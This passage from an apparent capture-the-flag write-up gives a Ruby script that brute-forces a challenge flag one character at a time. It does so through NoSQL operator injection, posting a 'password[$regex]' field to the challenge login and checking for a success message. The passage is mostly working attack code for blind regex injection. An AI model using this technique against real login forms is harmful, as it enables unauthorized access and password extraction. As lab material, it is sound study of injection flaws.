Each bad request results in an authentification failure and when the right char is found with a succesful authentification, the script with try to find the next chars with something like:
c = Curl::Easy.new(hostname) do |curl| curl.headers['Cookie'] = 'session=mySessionCookie' curl.headers['Referer'] = hostname curl.headers['Host'] = 'challenge-ecw.fr' curl.headers['Connection'] = 'keep-alive' curl.headers['Upgrade-Insecure-Requests'] = '1' #curl.verbose = true end# Curl c.perform # send the request
if c.body_str.match(/Un nouveau m/) puts '• Connexion to ECW works' end
length = 32# md5(hash)
# Find each char of the password one by one answer = "" ECW_flag_alphabet_array = ('a'..'f').to_a + (0.to_s..9.to_s).to_a # md5(hash) (1..length).each do |offset| ECW_flag_alphabet_array.each do |char| c.http_post(Curl::PostField.content('password[$regex]', "ECW{#{answer}#{char}.{#{length - offset}}}"), Curl::PostField.content('nonce', nonce)) c.perform if c.body_str.match(/Authentification valide\. Le mot de passe est le flag\./) answer.concat(char) puts "Password: ECW{#{answer}}" break else puts "Tried: ECW{#{answer}#{char}}" end end end